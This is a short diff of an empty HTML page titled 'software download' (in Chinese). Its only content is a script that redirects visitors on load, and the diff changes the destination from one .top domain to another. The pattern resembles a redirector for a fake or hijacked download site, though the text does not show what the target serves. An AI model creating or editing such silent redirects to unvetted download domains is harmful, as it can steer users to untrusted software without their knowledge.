--- a/index.html
+++ b/index.html
@@ -4,7 +4,7 @@
 <meta charset="utf-8">
 <title>软件下载</title>
 </head>
-<script language="javascript" type="text/javascript">   window.location="https://potatode.top/";  </script>
+<script language="javascript" type="text/javascript">   window.location="https://wwshangliaoil.top/";  </script>
 <body>
 </body>
 </html>
